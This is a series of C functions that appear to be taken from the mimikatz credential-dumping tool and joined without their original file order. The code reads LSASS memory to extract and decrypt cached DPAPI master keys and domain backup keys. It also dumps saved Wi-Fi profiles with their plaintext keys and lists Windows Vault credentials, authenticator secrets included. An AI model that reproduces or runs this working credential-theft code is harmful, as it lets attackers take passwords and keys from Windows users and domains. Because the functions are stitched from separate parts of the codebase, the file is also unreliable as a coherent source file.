void kull_m_cred_vault_policy_key_descr(DWORD level, PKULL_M_CRED_VAULT_POLICY_KEY key)
{
kprintf(L"%*s" L"**VAULT POLICY KEY**\n", level << 1, L"");
if(key)
{
kprintf(L"%*s" L" unk0 : ", level << 1, L""); kull_m_string_displayGUID(&key->unk0); kprintf(L"\n");
kprintf(L"%*s" L" unk1 : ", level << 1, L""); kull_m_string_displayGUID(&key->unk1); kprintf(L"\n");
kull_m_dpapi_blob_quick_descr(level + 1, key->KeyBlob);
kprintf(L"\n");
}
}
BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_dpapi(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData, IN OPTIONAL LPVOID pOptionalData)
{
KIWI_MASTERKEY_CACHE_ENTRY mesCredentials;
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hLocalMemory}, aKey = {NULL, &hLocalMemory}, aLsass = {NULL, pData->cLsass->hLsassMem};
PKUHL_M_SEKURLSA_PACKAGE pPackage = (pData->cLsass->osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_8) ? &kuhl_m_sekurlsa_dpapi_svc_package : &kuhl_m_sekurlsa_dpapi_lsa_package;
BYTE dgst[SHA_DIGEST_LENGTH];
DWORD monNb = 0;
if(pData->LogonType != Network)
{
kuhl_m_sekurlsa_printinfos_logonData(pData);
if(pPackage->Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &pPackage->Module, MasterKeyCacheReferences, ARRAYSIZE(MasterKeyCacheReferences), (PVOID *) &pMasterKeyCacheList, NULL, NULL, NULL))
{
aLsass.address = pMasterKeyCacheList;
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(LIST_ENTRY)))
{
aLsass.address = mesCredentials.Flink;
while(aLsass.address != pMasterKeyCacheList)
{
if(kull_m_memory_copy(&aBuffer, &aLsass, sizeof(KIWI_MASTERKEY_CACHE_ENTRY)))
{
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
{
kprintf(L"\t [%08x]\n\t * GUID :\t", monNb++);
kull_m_string_displayGUID(&mesCredentials.KeyUid);
kprintf(L"\n\t * Time :\t"); kull_m_string_displayLocalFileTime(&mesCredentials.insertTime);
if(aKey.address = LocalAlloc(LPTR, mesCredentials.keySize))
{
aLsass.address = (PBYTE) aLsass.address + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key);
if(kull_m_memory_copy(&aKey, &aLsass, mesCredentials.keySize))
{
(*pData->lsassLocalHelper->pLsaUnprotectMemory)(aKey.address, mesCredentials.keySize);
kprintf(L"\n\t * MasterKey :\t"); kull_m_string_wprintf_hex(aKey.address, mesCredentials.keySize, 0);
if(kull_m_crypto_hash(CALG_SHA1, aKey.address, mesCredentials.keySize, dgst, SHA_DIGEST_LENGTH))
{
kprintf(L"\n\t * sha1(key) :\t"); kull_m_string_wprintf_hex(dgst, SHA_DIGEST_LENGTH, 0);
kuhl_m_dpapi_oe_masterkey_add(&mesCredentials.KeyUid, dgst, SHA_DIGEST_LENGTH);
}
}
LocalFree(aKey.address);
}
kprintf(L"\n");
}
aLsass.address = mesCredentials.Flink;
}
else break;
}
}
} else kprintf(L"\n\tKO");
kprintf(L"\n");
}
return TRUE;
}
void kuhl_m_sysenv_display_vendorGuid(LPCGUID guid)
{
DWORD i;
for(i = 0; i < ARRAYSIZE(KUHL_M_SYSENV_GUIDSTORE); i++)
{
if(RtlEqualGuid(guid, &KUHL_M_SYSENV_GUIDSTORE[i].guid))
{
kprintf(L"%s - ", KUHL_M_SYSENV_GUIDSTORE[i].name);
break;
}
}
kull_m_string_displayGUID(guid);
}
void kull_m_cred_vault_policy_descr(DWORD level, PKULL_M_CRED_VAULT_POLICY policy)
{
kprintf(L"%*s" L"**VAULT POLICY**\n", level << 1, L"");
if(policy)
{
kprintf(L"%*s" L" version : %08x - %u\n", level << 1, L"", policy->version, policy->version);
kprintf(L"%*s" L" vault : ", level << 1, L""); kull_m_string_displayGUID(&policy->vault); kprintf(L"\n");
kprintf(L"%*s" L" Name : %s\n", level << 1, L"", policy->Name);
kprintf(L"%*s" L" unk0/1/2: %08x/%08x/%08x\n", level << 1, L"", policy->unk0, policy->unk1, policy->unk2);
if(policy->key)
kull_m_cred_vault_policy_key_descr(level + 1, policy->key);
kprintf(L"\n");
}
}
void kuhl_m_sekurlsa_bkey(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib, PKULL_M_PATCH_GENERIC generics, SIZE_T cbGenerics, BOOL isExport)
{
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
KULL_M_MEMORY_ADDRESS aLsass = {NULL, cLsass->hLsassMem}, aData = {NULL, &hBuffer};
GUID guid;
DWORD cb;
PVOID pGuid, pKeyLen, pKeyBuffer;
if(kuhl_m_sekurlsa_utils_search_generic(cLsass, pLib, generics, cbGenerics, &pGuid, &pKeyLen, &pKeyBuffer, NULL))
{
if(aLsass.address = pGuid)
{
aData.address = &guid;
if(kull_m_memory_copy(&aData, &aLsass, sizeof(GUID)))
{
kull_m_string_displayGUID(&guid); kprintf(L"\n");
if(aLsass.address = pKeyLen)
{
aData.address = &cb;
if(kull_m_memory_copy(&aData, &aLsass, sizeof(DWORD)))
{
if(cb && (aLsass.address = pKeyBuffer))
{
aData.address = &aLsass.address;
if(kull_m_memory_copy(&aData, &aLsass, sizeof(PVOID)))
{
if(aData.address = LocalAlloc(LPTR, cb))
{
if(kull_m_memory_copy(&aData, &aLsass, cb))
{
kuhl_m_lsadump_analyzeKey(&guid, (PKIWI_BACKUP_KEY) aData.address, cb, isExport);
}
LocalFree(aData.address);
}
}
}
}
}
}
}
}
}
void kull_m_cred_vault_credential_descr(DWORD level, PKULL_M_CRED_VAULT_CREDENTIAL credential)
{
DWORD i;
kprintf(L"%*s" L"**VAULT CREDENTIAL**\n", level << 1, L"");
if(credential)
{
kprintf(L"%*s" L" SchemaId : ", level << 1, L""); kull_m_string_displayGUID(&credential->SchemaId); kprintf(L"\n");
kprintf(L"%*s" L" unk0 : %08x - %u\n", level << 1, L"", credential->unk0, credential->unk0);
kprintf(L"%*s" L" LastWritten : ", level << 1, L""); kull_m_string_displayFileTime(&credential->LastWritten); kprintf(L"\n");
kprintf(L"%*s" L" unk1 : %08x - %u\n", level << 1, L"", credential->unk1, credential->unk1);
kprintf(L"%*s" L" unk2 : %08x - %u\n", level << 1, L"", credential->unk2, credential->unk2);
kprintf(L"%*s" L" FriendlyName : %s\n", level << 1, L"", credential->FriendlyName);
kprintf(L"%*s" L" dwAttributesMapSize : %08x - %u\n", level << 1, L"", credential->dwAttributesMapSize, credential->dwAttributesMapSize);
for(i = 0; i < (credential->dwAttributesMapSize / sizeof(KULL_M_CRED_VAULT_CREDENTIAL_ATTRIBUTE_MAP)); i++)
kprintf(L"%*s" L" * Attribute %3u @ offset %08x - %u (unk %08x - %u)\n", level << 1, L"", credential->attributesMap[i].id, credential->attributesMap[i].offset, credential->attributesMap[i].offset, credential->attributesMap[i].unk, credential->attributesMap[i].unk);
for(i = 0; i < credential->__cbElements; i++)
kull_m_cred_vault_credential_attribute_descr(level + 1, credential->attributes[i]);
kprintf(L"\n");
}
}
NTSTATUS kuhl_m_misc_wifi(int argc, wchar_t * argv[])
{
PWLAN_INTERFACE_INFO_LIST pInterfaceList;
PWLAN_PROFILE_INFO_LIST pProfileList;
LPWSTR pstrProfileXml;
DWORD pdwFlags;
if(kuhl_m_misc_hWlan)
{
if(WlanEnumInterfaces(kuhl_m_misc_hWlan, NULL, &pInterfaceList) == ERROR_SUCCESS)
{
for(pInterfaceList->dwIndex = 0; pInterfaceList->dwIndex < pInterfaceList->dwNumberOfItems; pInterfaceList->dwIndex++)
{
kprintf(L" * ");
kull_m_string_displayGUID(&pInterfaceList->InterfaceInfo[pInterfaceList->dwIndex].InterfaceGuid);
kprintf(L" / %s - %s\n", KUHL_M_MISC_WIFI_STATE[pInterfaceList->InterfaceInfo[pInterfaceList->dwIndex].isState], pInterfaceList->InterfaceInfo[pInterfaceList->dwIndex].strInterfaceDescription);
if(WlanGetProfileList(kuhl_m_misc_hWlan, &pInterfaceList->InterfaceInfo[pInterfaceList->dwIndex].InterfaceGuid, NULL, &pProfileList) == ERROR_SUCCESS)
{
for(pProfileList->dwIndex = 0; pProfileList->dwIndex < pProfileList->dwNumberOfItems; pProfileList->dwIndex++)
{
kprintf(L"\t| %s\n", pProfileList->ProfileInfo[pProfileList->dwIndex].strProfileName);
pdwFlags = WLAN_PROFILE_GET_PLAINTEXT_KEY;
//kprintf(L"%08x\n", pdwFlags);
if(WlanGetProfile(kuhl_m_misc_hWlan, &pInterfaceList->InterfaceInfo[pInterfaceList->dwIndex].InterfaceGuid, pProfileList->ProfileInfo[pProfileList->dwIndex].strProfileName, NULL, &pstrProfileXml, &pdwFlags, NULL) == ERROR_SUCCESS)
{
//kprintf(L"%08x\n", pdwFlags);
kprintf(L"%s\n", pstrProfileXml);
WlanFreeMemory(pstrProfileXml);
}
}
WlanFreeMemory(pProfileList);
}
}
WlanFreeMemory(pInterfaceList);
}
}
return STATUS_SUCCESS;
}
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_masterkeys(IN ULONG_PTR pMasterKeyCacheList, IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
{
KIWI_MASTERKEY_CACHE_ENTRY mesCredentials;
ULONG_PTR ptr;
ULONG monNb = 0;
PBYTE buffer;
if(ReadMemory(pMasterKeyCacheList, &mesCredentials, sizeof(LIST_ENTRY), NULL))
{
ptr = (ULONG_PTR) mesCredentials.Flink;
while(ptr != pMasterKeyCacheList)
{
if(ReadMemory(ptr, &mesCredentials, sizeof(KIWI_MASTERKEY_CACHE_ENTRY), NULL))
{
if(RtlEqualLuid(pData->LogonId, &mesCredentials.LogonId))
{
dprintf("\n\t [%08x]\n\t * GUID :\t", monNb++);
kull_m_string_displayGUID(&mesCredentials.KeyUid);
dprintf("\n\t * Time :\t"); kull_m_string_displayFileTime(&mesCredentials.insertTime);
if(buffer = (PBYTE) LocalAlloc(LPTR, mesCredentials.keySize))
{
if(ReadMemory(ptr + FIELD_OFFSET(KIWI_MASTERKEY_CACHE_ENTRY, key), buffer, mesCredentials.keySize, NULL))
{
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(buffer, mesCredentials.keySize);
dprintf("\n\t * MasterKey :\t"); kull_m_string_dprintf_hex(buffer, mesCredentials.keySize, 0);
}
LocalFree(buffer);
}
}
ptr = (ULONG_PTR) mesCredentials.Flink;
}
else break;
}
}
else dprintf("KO");
}
void kuhl_m_sid_displayMessage(PLDAP ld, PLDAPMessage pMessage)
{
PLDAPMessage pEntry;
PWCHAR pAttribute, name, domain;
BerElement* pBer = NULL;
PBERVAL *pBerVal;
DWORD i;
SID_NAME_USE nameUse;
for(pEntry = ldap_first_entry(ld, pMessage); pEntry; pEntry = ldap_next_entry(ld, pEntry))
{
kprintf(L"\n%s\n", ldap_get_dn(ld, pEntry));
for(pAttribute = ldap_first_attribute(ld, pEntry, &pBer); pAttribute; pAttribute = ldap_next_attribute(ld, pEntry, pBer))
{
kprintf(L" %s: ", pAttribute);
if(pBerVal = ldap_get_values_len(ld, pEntry, pAttribute))
{
if(
(_wcsicmp(pAttribute, L"name") == 0) ||
(_wcsicmp(pAttribute, L"sAMAccountName") == 0)
)
{
kprintf(L"%*S\n", pBerVal[0]->bv_len, pBerVal[0]->bv_val);
}
else if((_wcsicmp(pAttribute, L"objectSid") == 0))
{
kull_m_string_displaySID(pBerVal[0]->bv_val);
kprintf(L"\n");
}
else if((_wcsicmp(pAttribute, L"objectGUID") == 0))
{
kull_m_string_displayGUID((LPGUID) pBerVal[0]->bv_val);
kprintf(L"\n");
}
else
{
for(i = 0; pBerVal[i]; i++)
{
kprintf(L"\n [%u] ", i);
if((_wcsicmp(pAttribute, L"sIDHistory") == 0))
{
kull_m_string_displaySID(pBerVal[i]->bv_val);
if(kull_m_token_getNameDomainFromSID(pBerVal[i]->bv_val, &name, &domain, &nameUse, NULL))
{
kprintf(L" ( %s -- %s\\%s )", kull_m_token_getSidNameUse(nameUse), domain, name);
LocalFree(name);
LocalFree(domain);
}
}
else kull_m_string_wprintf_hex(pBerVal[i]->bv_val, pBerVal[i]->bv_len, 1);
}
kprintf(L"\n");
}
ldap_value_free_len(pBerVal);
}
ldap_memfree(pAttribute);
}
if(pBer)
ber_free(pBer, 0);
}
}
NTSTATUS kuhl_m_vault_list(int argc, wchar_t * argv[])
{
DWORD i, j, k, l, cbVaults, cbItems;
LPGUID vaults;
HANDLE hVault;
PVOID items;
PVAULT_ITEM_7 items7, pItem7;
PVAULT_ITEM_8 items8, pItem8;
NTSTATUS status;
if(isVaultInit)
{
if(NT_SUCCESS(VaultEnumerateVaults(0, &cbVaults, &vaults)))
{
for(i = 0; i < cbVaults; i++)
{
kprintf(L"\nVault : "); kull_m_string_displayGUID(&vaults[i]); kprintf(L"\n");
if(NT_SUCCESS(VaultOpenVault(&vaults[i], 0, &hVault)))
{
kuhl_m_vault_list_descVault(hVault);
if(NT_SUCCESS(VaultEnumerateItems(hVault, 0, &cbItems, &items)))
{
kprintf(L"\tItems (%u)\n", cbItems);
for(j = 0; j < cbItems; j++)
{
if(MIMIKATZ_NT_BUILD_NUMBER < KULL_M_WIN_MIN_BUILD_8) // to fix !
{
items7 = (PVAULT_ITEM_7) items;
kprintf(L"\t %2u.\t%s\n", j, items7[j].FriendlyName);
kprintf(L"\t\tType : "); kull_m_string_displayGUID(&items7[j].SchemaId); kprintf(L"\n");
kprintf(L"\t\tLastWritten : "); kull_m_string_displayLocalFileTime(&items7[j].LastWritten); kprintf(L"\n");
kprintf(L"\t\tFlags : %08x\n", items7[j].Flags);
kprintf(L"\t\tRessource : "); kuhl_m_vault_list_descItemData(items7[j].Ressource); kprintf(L"\n");
kprintf(L"\t\tIdentity : "); kuhl_m_vault_list_descItemData(items7[j].Identity); kprintf(L"\n");
kprintf(L"\t\tAuthenticator : "); kuhl_m_vault_list_descItemData(items7[j].Authenticator); kprintf(L"\n");
for(k = 0; k < items7[j].cbProperties; k++)
{
kprintf(L"\t\tProperty %2u : ", k); kuhl_m_vault_list_descItemData(items7[j].Properties + k); kprintf(L"\n");
}
pItem7 = NULL;
status = VaultGetItem7(hVault, &items7[j].SchemaId, items7[j].Ressource, items7[j].Identity, NULL, 0, &pItem7);
kprintf(L"\t\t*Authenticator* : ");
if(status == STATUS_SUCCESS)
kuhl_m_vault_list_descItemData(pItem7->Authenticator);
else
PRINT_ERROR(L"VaultGetItem7 : %08x", status);
kprintf(L"\n");
;
}
else
{
items8 = (PVAULT_ITEM_8) items;
kprintf(L"\t %2u.\t%s\n", j, items8[j].FriendlyName);
kprintf(L"\t\tType : "); kull_m_string_displayGUID(&items8[j].SchemaId); kprintf(L"\n");
kprintf(L"\t\tLastWritten : "); kull_m_string_displayLocalFileTime(&items8[j].LastWritten); kprintf(L"\n");
kprintf(L"\t\tFlags : %08x\n", items8[j].Flags);
kprintf(L"\t\tRessource : "); kuhl_m_vault_list_descItemData(items8[j].Ressource); kprintf(L"\n");
kprintf(L"\t\tIdentity : "); kuhl_m_vault_list_descItemData(items8[j].Identity); kprintf(L"\n");
kprintf(L"\t\tAuthenticator : "); kuhl_m_vault_list_descItemData(items8[j].Authenticator); kprintf(L"\n");
kprintf(L"\t\tPackageSid : "); kuhl_m_vault_list_descItemData(items8[j].PackageSid); kprintf(L"\n");
for(k = 0; k < items8[j].cbProperties; k++)
{
kprintf(L"\t\tProperty %2u : ", k); kuhl_m_vault_list_descItemData(items8[j].Properties + k); kprintf(L"\n");
}
pItem8 = NULL;
status = VaultGetItem8(hVault, &items8[j].SchemaId, items8[j].Ressource, items8[j].Identity, items8[j].PackageSid, NULL, 0, &pItem8);
kprintf(L"\t\t*Authenticator* : ");
if(status == STATUS_SUCCESS)
kuhl_m_vault_list_descItemData(pItem8->Authenticator);
else
PRINT_ERROR(L"VaultGetItem8 : %08x\n", status);
kprintf(L"\n");
for(l = 0; l < (sizeof(schemaHelper) / sizeof(VAULT_SCHEMA_HELPER)); l++)
{
if(RtlEqualGuid(&items8[j].SchemaId, &schemaHelper[l].guidString.guid))
{
kprintf(L"\n\t\t*** %s ***\n", schemaHelper[l].guidString.text);
if(schemaHelper[l].helper)
{
schemaHelper[l].helper(&schemaHelper[l].guidString, &items8[j], ((status == STATUS_SUCCESS) && pItem8) ? pItem8 : NULL, TRUE);
kprintf(L"\n");
}
break;
}
}
if(pItem8)
VaultFree(pItem8);
}
}
VaultFree(items);
}
VaultCloseVault(&hVault);
}
}
}
VaultFree(vaults);
}
return STATUS_SUCCESS;
}